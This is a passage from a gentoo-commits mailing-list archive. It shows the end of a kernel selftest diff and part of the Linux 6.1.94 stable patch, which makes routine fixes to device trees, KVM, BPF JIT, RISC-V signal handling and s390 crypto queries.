+ 
+ 	fd = open("/proc/sys/vm/nr_hugepages", O_RDWR | O_NONBLOCK);
+ 	if (fd < 0) {
+-		perror("Failed to open /proc/sys/vm/nr_hugepages");
+-		return -1;
++		ksft_print_msg("Failed to open /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
++		ret = -1;
++		goto out;
+ 	}
+ 
+ 	if (read(fd, initial_nr_hugepages, sizeof(initial_nr_hugepages)) <= 0) {
+-		perror("Failed to read from /proc/sys/vm/nr_hugepages");
++		ksft_print_msg("Failed to read from /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
++	lseek(fd, 0, SEEK_SET);
++
+ 	/* Start with the initial condition of 0 huge pages*/
+ 	if (write(fd, "0", sizeof(char)) != sizeof(char)) {
+-		perror("Failed to write 0 to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write 0 to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+@@ -114,82 +122,82 @@ int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
+ 	/* Request a large number of huge pages. The Kernel will allocate
+ 	   as much as it can */
+ 	if (write(fd, "100000", (6*sizeof(char))) != (6*sizeof(char))) {
+-		perror("Failed to write 100000 to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write 100000 to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+ 	lseek(fd, 0, SEEK_SET);
+ 
+ 	if (read(fd, nr_hugepages, sizeof(nr_hugepages)) <= 0) {
+-		perror("Failed to re-read from /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to re-read from /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+ 	/* We should have been able to request at least 1/3 rd of the memory in
+ 	   huge pages */
+-	compaction_index = mem_free/(atoi(nr_hugepages) * hugepage_size);
+-
+-	if (compaction_index > 3) {
+-		printf("No of huge pages allocated = %d\n",
+-		       (atoi(nr_hugepages)));
+-		fprintf(stderr, "ERROR: Less that 1/%d of memory is available\n"
+-			"as huge pages\n", compaction_index);
++	nr_hugepages_ul = strtoul(nr_hugepages, NULL, 10);
++	if (!nr_hugepages_ul) {
++		ksft_print_msg("ERROR: No memory is available as huge pages\n");
+ 		goto close_fd;
+ 	}
+-
+-	printf("No of huge pages allocated = %d\n",
+-	       (atoi(nr_hugepages)));
++	compaction_index = mem_free/(nr_hugepages_ul * hugepage_size);
+ 
+ 	lseek(fd, 0, SEEK_SET);
+ 
+ 	if (write(fd, initial_nr_hugepages, strlen(initial_nr_hugepages))
+ 	    != strlen(initial_nr_hugepages)) {
+-		perror("Failed to write value to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write value to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+-	close(fd);
+-	return 0;
++	ksft_print_msg("Number of huge pages allocated = %lu\n",
++		       nr_hugepages_ul);
++
++	if (compaction_index > 3) {
++		ksft_print_msg("ERROR: Less than 1/%d of memory is available\n"
++			       "as huge pages\n", compaction_index);
++		goto close_fd;
++	}
++
++	ret = 0;
+ 
+  close_fd:
+ 	close(fd);
+-	printf("Not OK. Compaction test failed.");
+-	return -1;
++ out:
++	ksft_test_result(ret == 0, "check_compaction\n");
++	return ret;
+ }
+ 
+ 
+ int main(int argc, char **argv)
+ {
+ 	struct rlimit lim;
+-	struct map_list *list, *entry;
++	struct map_list *list = NULL, *entry;
+ 	size_t page_size, i;
+ 	void *map = NULL;
+ 	unsigned long mem_free = 0;
+ 	unsigned long hugepage_size = 0;
+ 	long mem_fragmentable_MB = 0;
+ 
+-	if (prereq() != 0) {
+-		printf("Either the sysctl compact_unevictable_allowed is not\n"
+-		       "set to 1 or couldn't read the proc file.\n"
+-		       "Skipping the test\n");
+-		return KSFT_SKIP;
+-	}
++	ksft_print_header();
++
++	if (prereq() != 0)
++		return ksft_exit_pass();
++
++	ksft_set_plan(1);
+ 
+ 	lim.rlim_cur = RLIM_INFINITY;
+ 	lim.rlim_max = RLIM_INFINITY;
+-	if (setrlimit(RLIMIT_MEMLOCK, &lim)) {
+-		perror("Failed to set rlimit:\n");
+-		return -1;
+-	}
++	if (setrlimit(RLIMIT_MEMLOCK, &lim))
++		ksft_exit_fail_msg("Failed to set rlimit: %s\n", strerror(errno));
+ 
+ 	page_size = getpagesize();
+ 
+-	list = NULL;
+-
+-	if (read_memory_info(&mem_free, &hugepage_size) != 0) {
+-		printf("ERROR: Cannot read meminfo\n");
+-		return -1;
+-	}
++	if (read_memory_info(&mem_free, &hugepage_size) != 0)
++		ksft_exit_fail_msg("Failed to get meminfo\n");
+ 
+ 	mem_fragmentable_MB = mem_free * 0.8 / 1024;
+ 
+@@ -225,7 +233,7 @@ int main(int argc, char **argv)
+ 	}
+ 
+ 	if (check_compaction(mem_free, hugepage_size) == 0)
+-		return 0;
++		return ksft_exit_pass();
+ 
+-	return -1;
++	return ksft_exit_fail();
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-16 14:33 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-16 14:33 UTC (permalink / raw
  To: gentoo-commits

commit:     4ee39adbcd6679173df7cf39402a7343df4f580b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jun 16 14:33:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jun 16 14:33:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4ee39adb

Linux patch 6.1.94

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1093_linux-6.1.94.patch | 3788 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3792 insertions(+)

diff --git a/0000_README b/0000_README
index 87ce6763..f71731e0 100644
--- a/0000_README
+++ b/0000_README
@@ -415,6 +415,10 @@ Patch:  1092_linux-6.1.93.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.93
 
+Patch:  1093_linux-6.1.94.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.94
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1093_linux-6.1.94.patch b/1093_linux-6.1.94.patch
new file mode 100644
index 00000000..ef37672b
--- /dev/null
+++ b/1093_linux-6.1.94.patch
@@ -0,0 +1,3788 @@
+diff --git a/Documentation/mm/arch_pgtable_helpers.rst b/Documentation/mm/arch_pgtable_helpers.rst
+index cbaee9e592410..511b4314095b5 100644
+--- a/Documentation/mm/arch_pgtable_helpers.rst
++++ b/Documentation/mm/arch_pgtable_helpers.rst
+@@ -136,7 +136,8 @@ PMD Page Table Helpers
+ +---------------------------+--------------------------------------------------+
+ | pmd_swp_clear_soft_dirty  | Clears a soft dirty swapped PMD                  |
+ +---------------------------+--------------------------------------------------+
+-| pmd_mkinvalid             | Invalidates a mapped PMD [1]                     |
++| pmd_mkinvalid             | Invalidates a present PMD; do not call for       |
++|                           | non-present PMD [1]                              |
+ +---------------------------+--------------------------------------------------+
+ | pmd_set_huge              | Creates a PMD huge mapping                       |
+ +---------------------------+--------------------------------------------------+
+@@ -192,7 +193,8 @@ PUD Page Table Helpers
+ +---------------------------+--------------------------------------------------+
+ | pud_mkdevmap              | Creates a ZONE_DEVICE mapped PUD                 |
+ +---------------------------+--------------------------------------------------+
+-| pud_mkinvalid             | Invalidates a mapped PUD [1]                     |
++| pud_mkinvalid             | Invalidates a present PUD; do not call for       |
++|                           | non-present PUD [1]                              |
+ +---------------------------+--------------------------------------------------+
+ | pud_set_huge              | Creates a PUD huge mapping                       |
+ +---------------------------+--------------------------------------------------+
+diff --git a/Makefile b/Makefile
+index c5147f1c46f87..6c21684b032ee 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 93
++SUBLEVEL = 94
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi b/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
+index a83b9d4f172e3..add54f4e7be97 100644
+--- a/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
++++ b/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
+@@ -58,7 +58,7 @@ cpu@3 {
+ 	gic: interrupt-controller@f1001000 {
+ 		compatible = "arm,gic-400";
+ 		reg = <0x0 0xf1001000 0x0 0x1000>,  /* GICD */
+-		      <0x0 0xf1002000 0x0 0x100>;   /* GICC */
++		      <0x0 0xf1002000 0x0 0x2000>;  /* GICC */
+ 		#address-cells = <0>;
+ 		#interrupt-cells = <3>;
+ 		interrupt-controller;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts b/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
+index d461da0b80492..22cb4d5f0416e 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
+@@ -9,8 +9,8 @@ / {
+ 	compatible = "nvidia,norrin", "nvidia,tegra132", "nvidia,tegra124";
+ 
+ 	aliases {
+-		rtc0 = "/i2c@7000d000/as3722@40";
+-		rtc1 = "/rtc@7000e000";
++		rtc0 = &as3722;
++		rtc1 = &tegra_rtc;
+ 		serial0 = &uarta;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/nvidia/tegra132.dtsi b/arch/arm64/boot/dts/nvidia/tegra132.dtsi
+index 3673f79adf1a9..ca8960f0c4ab9 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra132.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra132.dtsi
+@@ -579,7 +579,7 @@ spi@7000de00 {
+ 		status = "disabled";
+ 	};
+ 
+-	rtc@7000e000 {
++	tegra_rtc: rtc@7000e000 {
+ 		compatible = "nvidia,tegra124-rtc", "nvidia,tegra20-rtc";
+ 		reg = <0x0 0x7000e000 0x0 0x100>;
+ 		interrupts = <GIC_SPI 2 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi b/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
+index 1678ef0f8684f..737a67e0a6ad7 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
+@@ -60,7 +60,7 @@ bluetooth {
+ 		vddrf-supply = <&vreg_l1_1p3>;
+ 		vddch0-supply = <&vdd_ch0_3p3>;
+ 
+-		local-bd-address = [ 02 00 00 00 5a ad ];
++		local-bd-address = [ 00 00 00 00 00 00 ];
+ 
+ 		max-speed = <3200000>;
+ 	};
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index f44ae09a51956..5dbaf3fe90221 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -250,6 +250,7 @@ static int set_core_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 		case PSR_AA32_MODE_SVC:
+ 		case PSR_AA32_MODE_ABT:
+ 		case PSR_AA32_MODE_UND:
++		case PSR_AA32_MODE_SYS:
+ 			if (!vcpu_el1_is_32bit(vcpu))
+ 				return -EINVAL;
+ 			break;
+@@ -270,7 +271,7 @@ static int set_core_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	if (*vcpu_cpsr(vcpu) & PSR_MODE32_BIT) {
+ 		int i, nr_reg;
+ 
+-		switch (*vcpu_cpsr(vcpu)) {
++		switch (*vcpu_cpsr(vcpu) & PSR_AA32_MODE_MASK) {
+ 		/*
+ 		 * Either we are dealing with user mode, and only the
+ 		 * first 15 registers (+ PC) must be narrowed to 32bit.
+diff --git a/arch/arm64/kvm/hyp/aarch32.c b/arch/arm64/kvm/hyp/aarch32.c
+index f98cbe2626a1c..19efb41aab805 100644
+--- a/arch/arm64/kvm/hyp/aarch32.c
++++ b/arch/arm64/kvm/hyp/aarch32.c
+@@ -50,9 +50,23 @@ bool kvm_condition_valid32(const struct kvm_vcpu *vcpu)
+ 	u32 cpsr_cond;
+ 	int cond;
+ 
+-	/* Top two bits non-zero?  Unconditional. */
+-	if (kvm_vcpu_get_esr(vcpu) >> 30)
++	/*
++	 * These are the exception classes that could fire with a
++	 * conditional instruction.
++	 */
++	switch (kvm_vcpu_trap_get_class(vcpu)) {
++	case ESR_ELx_EC_CP15_32:
++	case ESR_ELx_EC_CP15_64:
++	case ESR_ELx_EC_CP14_MR:
++	case ESR_ELx_EC_CP14_LS:
++	case ESR_ELx_EC_FP_ASIMD:
++	case ESR_ELx_EC_CP10_ID:
++	case ESR_ELx_EC_CP14_64:
++	case ESR_ELx_EC_SVC32:
++		break;
++	default:
+ 		return true;
++	}
+ 
+ 	/* Is condition field valid? */
+ 	cond = kvm_vcpu_get_condition(vcpu);
+diff --git a/arch/parisc/include/asm/page.h b/arch/parisc/include/asm/page.h
+index 6faaaa3ebe9b8..e93baddf3a2e7 100644
+--- a/arch/parisc/include/asm/page.h
++++ b/arch/parisc/include/asm/page.h
+@@ -16,6 +16,7 @@
+ #define PAGE_SIZE	(_AC(1,UL) << PAGE_SHIFT)
+ #define PAGE_MASK	(~(PAGE_SIZE-1))
+ 
++#define HAVE_ARCH_HUGETLB_UNMAPPED_AREA
+ 
+ #ifndef __ASSEMBLY__
+ 
+diff --git a/arch/parisc/include/asm/signal.h b/arch/parisc/include/asm/signal.h
+index 715c96ba2ec81..e84883c6b4c7a 100644
+--- a/arch/parisc/include/asm/signal.h
++++ b/arch/parisc/include/asm/signal.h
+@@ -4,23 +4,11 @@
+ 
+ #include <uapi/asm/signal.h>
+ 
+-#define _NSIG		64
+-/* bits-per-word, where word apparently means 'long' not 'int' */
+-#define _NSIG_BPW	BITS_PER_LONG
+-#define _NSIG_WORDS	(_NSIG / _NSIG_BPW)
+-
+ # ifndef __ASSEMBLY__
+ 
+ /* Most things should be clean enough to redefine this at will, if care
+    is taken to make libc match.  */
+ 
+-typedef unsigned long old_sigset_t;		/* at least 32 bits */
+-
+-typedef struct {
+-	/* next_signal() assumes this is a long - no choice */
+-	unsigned long sig[_NSIG_WORDS];
+-} sigset_t;
+-
+ #include <asm/sigcontext.h>
+ 
+ #endif /* !__ASSEMBLY */
+diff --git a/arch/parisc/include/uapi/asm/signal.h b/arch/parisc/include/uapi/asm/signal.h
+index 8e4895c5ea5d3..40d7a574c5dd1 100644
+--- a/arch/parisc/include/uapi/asm/signal.h
++++ b/arch/parisc/include/uapi/asm/signal.h
+@@ -57,10 +57,20 @@
+ 
+ #include <asm-generic/signal-defs.h>
+ 
++#define _NSIG		64
++#define _NSIG_BPW	(sizeof(unsigned long) * 8)
++#define _NSIG_WORDS	(_NSIG / _NSIG_BPW)
++
+ # ifndef __ASSEMBLY__
+ 
+ #  include <linux/types.h>
+ 
++typedef unsigned long old_sigset_t;	/* at least 32 bits */
++
++typedef struct {
++	unsigned long sig[_NSIG_WORDS];
++} sigset_t;
++
+ /* Avoid too many header ordering problems.  */
+ struct siginfo;
+ 
+diff --git a/arch/powerpc/mm/book3s64/pgtable.c b/arch/powerpc/mm/book3s64/pgtable.c
+index 87aa76c737995..a3bce0895b7d2 100644
+--- a/arch/powerpc/mm/book3s64/pgtable.c
++++ b/arch/powerpc/mm/book3s64/pgtable.c
+@@ -124,6 +124,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ {
+ 	unsigned long old_pmd;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	old_pmd = pmd_hugepage_update(vma->vm_mm, address, pmdp, _PAGE_PRESENT, _PAGE_INVALID);
+ 	flush_pmd_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+ 	return __pmd(old_pmd);
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index 8643b2c8b76ef..7b3bf859433a5 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -814,6 +814,15 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* Get offset into TMP_REG */
+ 			EMIT(PPC_RAW_LI(tmp_reg, off));
++			/*
++			 * Enforce full ordering for operations with BPF_FETCH by emitting a 'sync'
++			 * before and after the operation.
++			 *
++			 * This is a requirement in the Linux Kernel Memory Model.
++			 * See __cmpxchg_u32() in asm/cmpxchg.h as an example.
++			 */
++			if ((imm & BPF_FETCH) && IS_ENABLED(CONFIG_SMP))
++				EMIT(PPC_RAW_SYNC());
+ 			tmp_idx = ctx->idx * 4;
+ 			/* load value from memory into r0 */
+ 			EMIT(PPC_RAW_LWARX(_R0, tmp_reg, dst_reg, 0));
+@@ -867,6 +876,9 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* For the BPF_FETCH variant, get old data into src_reg */
+ 			if (imm & BPF_FETCH) {
++				/* Emit 'sync' to enforce full ordering */
++				if (IS_ENABLED(CONFIG_SMP))
++					EMIT(PPC_RAW_SYNC());
+ 				EMIT(PPC_RAW_MR(ret_reg, ax_reg));
+ 				if (!fp->aux->verifier_zext)
+ 					EMIT(PPC_RAW_LI(ret_reg - 1, 0)); /* higher 32-bit */
+diff --git a/arch/powerpc/net/bpf_jit_comp64.c b/arch/powerpc/net/bpf_jit_comp64.c
+index 29ee306d6302e..dcb625404938f 100644
+--- a/arch/powerpc/net/bpf_jit_comp64.c
++++ b/arch/powerpc/net/bpf_jit_comp64.c
+@@ -784,6 +784,15 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* Get offset into TMP_REG_1 */
+ 			EMIT(PPC_RAW_LI(tmp1_reg, off));
++			/*
++			 * Enforce full ordering for operations with BPF_FETCH by emitting a 'sync'
++			 * before and after the operation.
++			 *
++			 * This is a requirement in the Linux Kernel Memory Model.
++			 * See __cmpxchg_u64() in asm/cmpxchg.h as an example.
++			 */
++			if ((imm & BPF_FETCH) && IS_ENABLED(CONFIG_SMP))
++				EMIT(PPC_RAW_SYNC());
+ 			tmp_idx = ctx->idx * 4;
+ 			/* load value from memory into TMP_REG_2 */
+ 			if (size == BPF_DW)
+@@ -846,6 +855,9 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 			PPC_BCC_SHORT(COND_NE, tmp_idx);
+ 
+ 			if (imm & BPF_FETCH) {
++				/* Emit 'sync' to enforce full ordering */
++				if (IS_ENABLED(CONFIG_SMP))
++					EMIT(PPC_RAW_SYNC());
+ 				EMIT(PPC_RAW_MR(ret_reg, _R0));
+ 				/*
+ 				 * Skip unnecessary zero-extension for 32-bit cmpxchg.
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index dee66c9290cce..36bb15af6fa82 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -246,30 +246,6 @@ static void handle_signal(struct ksignal *ksig, struct pt_regs *regs)
+ 	sigset_t *oldset = sigmask_to_save();
+ 	int ret;
+ 
+-	/* Are we from a system call? */
+-	if (regs->cause == EXC_SYSCALL) {
+-		/* Avoid additional syscall restarting via ret_from_exception */
+-		regs->cause = -1UL;
+-		/* If so, check system call restarting.. */
+-		switch (regs->a0) {
+-		case -ERESTART_RESTARTBLOCK:
+-		case -ERESTARTNOHAND:
+-			regs->a0 = -EINTR;
+-			break;
+-
+-		case -ERESTARTSYS:
+-			if (!(ksig->ka.sa.sa_flags & SA_RESTART)) {
+-				regs->a0 = -EINTR;
+-				break;
+-			}
+-			fallthrough;
+-		case -ERESTARTNOINTR:
+-                        regs->a0 = regs->orig_a0;
+-			regs->epc -= 0x4;
+-			break;
+-		}
+-	}
+-
+ 	rseq_signal_deliver(ksig, regs);
+ 
+ 	/* Set up the stack frame */
+@@ -283,35 +259,66 @@ static void handle_signal(struct ksignal *ksig, struct pt_regs *regs)
+ 
+ static void do_signal(struct pt_regs *regs)
+ {
++	unsigned long continue_addr = 0, restart_addr = 0;
++	int retval = 0;
+ 	struct ksignal ksig;
++	bool syscall = (regs->cause == EXC_SYSCALL);
+ 
+-	if (get_signal(&ksig)) {
+-		/* Actually deliver the signal */
+-		handle_signal(&ksig, regs);
+-		return;
+-	}
++	/* If we were from a system call, check for system call restarting */
++	if (syscall) {
++		continue_addr = regs->epc;
++		restart_addr = continue_addr - 4;
++		retval = regs->a0;
+ 
+-	/* Did we come from a system call? */
+-	if (regs->cause == EXC_SYSCALL) {
+ 		/* Avoid additional syscall restarting via ret_from_exception */
+ 		regs->cause = -1UL;
+ 
+-		/* Restart the system call - no handlers present */
+-		switch (regs->a0) {
++		/*
++		 * Prepare for system call restart. We do this here so that a
++		 * debugger will see the already changed PC.
++		 */
++		switch (retval) {
+ 		case -ERESTARTNOHAND:
+ 		case -ERESTARTSYS:
+ 		case -ERESTARTNOINTR:
+-                        regs->a0 = regs->orig_a0;
+-			regs->epc -= 0x4;
+-			break;
+ 		case -ERESTART_RESTARTBLOCK:
+-                        regs->a0 = regs->orig_a0;
+-			regs->a7 = __NR_restart_syscall;
+-			regs->epc -= 0x4;
++			regs->a0 = regs->orig_a0;
++			regs->epc = restart_addr;
+ 			break;
+ 		}
+ 	}
+ 
++	/*
++	 * Get the signal to deliver. When running under ptrace, at this point
++	 * the debugger may change all of our registers.
++	 */
++	if (get_signal(&ksig)) {
++		/*
++		 * Depending on the signal settings, we may need to revert the
++		 * decision to restart the system call, but skip this if a
++		 * debugger has chosen to restart at a different PC.
++		 */
++		if (regs->epc == restart_addr &&
++		    (retval == -ERESTARTNOHAND ||
++		     retval == -ERESTART_RESTARTBLOCK ||
++		     (retval == -ERESTARTSYS &&
++		      !(ksig.ka.sa.sa_flags & SA_RESTART)))) {
++			regs->a0 = -EINTR;
++			regs->epc = continue_addr;
++		}
++
++		/* Actually deliver the signal */
++		handle_signal(&ksig, regs);
++		return;
++	}
++
++	/*
++	 * Handle restarting a different system call. As above, if a debugger
++	 * has chosen to restart at a different PC, ignore the restart.
++	 */
++	if (syscall && regs->epc == restart_addr && retval == -ERESTART_RESTARTBLOCK)
++		regs->a7 = __NR_restart_syscall;
++
+ 	/*
+ 	 * If there is no signal to deliver, we just put the saved
+ 	 * sigmask back.
+diff --git a/arch/s390/include/asm/cpacf.h b/arch/s390/include/asm/cpacf.h
+index 646b12981f208..0f6ff2008a159 100644
+--- a/arch/s390/include/asm/cpacf.h
++++ b/arch/s390/include/asm/cpacf.h
+@@ -161,28 +161,86 @@
+ 
+ typedef struct { unsigned char bytes[16]; } cpacf_mask_t;
+ 
+-/**
+- * cpacf_query() - check if a specific CPACF function is available
+- * @opcode: the opcode of the crypto instruction
+- * @func: the function code to test for
+- *
+- * Executes the query function for the given crypto instruction @opcode
+- * and checks if @func is available
+- *
+- * Returns 1 if @func is available for @opcode, 0 otherwise
++/*
++ * Prototype for a not existing function to produce a link
++ * error if __cpacf_query() or __cpacf_check_opcode() is used
++ * with an invalid compile time const opcode.
+  */
+-static __always_inline void __cpacf_query(unsigned int opcode, cpacf_mask_t *mask)
++void __cpacf_bad_opcode(void);
++
++static __always_inline void __cpacf_query_rre(u32 opc, u8 r1, u8 r2,
++					      cpacf_mask_t *mask)
+ {
+ 	asm volatile(
+-		"	lghi	0,0\n" /* query function */
+-		"	lgr	1,%[mask]\n"
+-		"	spm	0\n" /* pckmo doesn't change the cc */
+-		/* Parameter regs are ignored, but must be nonzero and unique */
+-		"0:	.insn	rrf,%[opc] << 16,2,4,6,0\n"
+-		"	brc	1,0b\n"	/* handle partial completion */
+-		: "=m" (*mask)
+-		: [mask] "d" ((unsigned long)mask), [opc] "i" (opcode)
+-		: "cc", "0", "1");
++		"	la	%%r1,%[mask]\n"
++		"	xgr	%%r0,%%r0\n"
++		"	.insn	rre,%[opc] << 16,%[r1],%[r2]\n"
++		: [mask] "=R" (*mask)
++		: [opc] "i" (opc),
++		  [r1] "i" (r1), [r2] "i" (r2)
++		: "cc", "r0", "r1");
++}
++
++static __always_inline void __cpacf_query_rrf(u32 opc,
++					      u8 r1, u8 r2, u8 r3, u8 m4,
++					      cpacf_mask_t *mask)
++{
++	asm volatile(
++		"	la	%%r1,%[mask]\n"
++		"	xgr	%%r0,%%r0\n"
++		"	.insn	rrf,%[opc] << 16,%[r1],%[r2],%[r3],%[m4]\n"
++		: [mask] "=R" (*mask)
++		: [opc] "i" (opc), [r1] "i" (r1), [r2] "i" (r2),
++		  [r3] "i" (r3), [m4] "i" (m4)
++		: "cc", "r0", "r1");
++}
++
++static __always_inline void __cpacf_query(unsigned int opcode,
++					  cpacf_mask_t *mask)
++{
++	switch (opcode) {
++	case CPACF_KDSA:
++		__cpacf_query_rre(CPACF_KDSA, 0, 2, mask);
++		break;
++	case CPACF_KIMD:
++		__cpacf_query_rre(CPACF_KIMD, 0, 2, mask);
++		break;
++	case CPACF_KLMD:
++		__cpacf_query_rre(CPACF_KLMD, 0, 2, mask);
++		break;
++	case CPACF_KM:
++		__cpacf_query_rre(CPACF_KM, 2, 4, mask);
++		break;
++	case CPACF_KMA:
++		__cpacf_query_rrf(CPACF_KMA, 2, 4, 6, 0, mask);
++		break;
++	case CPACF_KMAC:
++		__cpacf_query_rre(CPACF_KMAC, 0, 2, mask);
++		break;
++	case CPACF_KMC:
++		__cpacf_query_rre(CPACF_KMC, 2, 4, mask);
++		break;
++	case CPACF_KMCTR:
++		__cpacf_query_rrf(CPACF_KMCTR, 2, 4, 6, 0, mask);
++		break;
++	case CPACF_KMF:
++		__cpacf_query_rre(CPACF_KMF, 2, 4, mask);
++		break;
++	case CPACF_KMO:
++		__cpacf_query_rre(CPACF_KMO, 2, 4, mask);
++		break;
++	case CPACF_PCC:
++		__cpacf_query_rre(CPACF_PCC, 0, 0, mask);
++		break;
++	case CPACF_PCKMO:
++		__cpacf_query_rre(CPACF_PCKMO, 0, 0, mask);
++		break;
++	case CPACF_PRNO:
++		__cpacf_query_rre(CPACF_PRNO, 2, 4, mask);
++		break;
++	default:
++		__cpacf_bad_opcode();
++	}
+ }
+ 
+ static __always_inline int __cpacf_check_opcode(unsigned int opcode)
+@@ -206,10 +264,21 @@ static __always_inline int __cpacf_check_opcode(unsigned int opcode)
+ 	case CPACF_KMA:
+ 		return test_facility(146);	/* check for MSA8 */
+ 	default:
+-		BUG();
++		__cpacf_bad_opcode();
++		return 0;
+ 	}
+ }
+ 
++/**
++ * cpacf_query() - check if a specific CPACF function is available
++ * @opcode: the opcode of the crypto instruction
++ * @func: the function code to test for
++ *
++ * Executes the query function for the given crypto instruction @opcode
++ * and checks if @func is available
++ *
++ * Returns 1 if @func is available for @opcode, 0 otherwise
++ */
+ static __always_inline int cpacf_query(unsigned int opcode, cpacf_mask_t *mask)
+ {
+ 	if (__cpacf_check_opcode(opcode)) {
+diff --git a/arch/s390/include/asm/pgtable.h b/arch/s390/include/asm/pgtable.h
+index 11e901286414c..956300e3568a4 100644
+--- a/arch/s390/include/asm/pgtable.h
++++ b/arch/s390/include/asm/pgtable.h
+@@ -1686,8 +1686,10 @@ static inline pmd_t pmdp_huge_clear_flush(struct vm_area_struct *vma,
+ static inline pmd_t pmdp_invalidate(struct vm_area_struct *vma,
+ 				   unsigned long addr, pmd_t *pmdp)
+ {
+-	pmd_t pmd = __pmd(pmd_val(*pmdp) | _SEGMENT_ENTRY_INVALID);
++	pmd_t pmd;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
++	pmd = __pmd(pmd_val(*pmdp) | _SEGMENT_ENTRY_INVALID);
+ 	return pmdp_xchg_direct(vma->vm_mm, addr, pmdp, pmd);
+ }
+ 
+diff --git a/arch/sparc/include/asm/smp_64.h b/arch/sparc/include/asm/smp_64.h
+index e75783b6abc42..16ab904616a0c 100644
+--- a/arch/sparc/include/asm/smp_64.h
++++ b/arch/sparc/include/asm/smp_64.h
+@@ -47,7 +47,6 @@ void arch_send_call_function_ipi_mask(const struct cpumask *mask);
+ int hard_smp_processor_id(void);
+ #define raw_smp_processor_id() (current_thread_info()->cpu)
+ 
+-void smp_fill_in_cpu_possible_map(void);
+ void smp_fill_in_sib_core_maps(void);
+ void cpu_play_dead(void);
+ 
+@@ -77,7 +76,6 @@ void __cpu_die(unsigned int cpu);
+ #define smp_fill_in_sib_core_maps() do { } while (0)
+ #define smp_fetch_global_regs() do { } while (0)
+ #define smp_fetch_global_pmu() do { } while (0)
+-#define smp_fill_in_cpu_possible_map() do { } while (0)
+ #define smp_init_cpu_poke() do { } while (0)
+ #define scheduler_poke() do { } while (0)
+ 
+diff --git a/arch/sparc/include/uapi/asm/termbits.h b/arch/sparc/include/uapi/asm/termbits.h
+index 4321322701fcf..0da2b1adc0f52 100644
+--- a/arch/sparc/include/uapi/asm/termbits.h
++++ b/arch/sparc/include/uapi/asm/termbits.h
+@@ -10,16 +10,6 @@ typedef unsigned int	tcflag_t;
+ typedef unsigned long	tcflag_t;
+ #endif
+ 
+-#define NCC 8
+-struct termio {
+-	unsigned short c_iflag;		/* input mode flags */
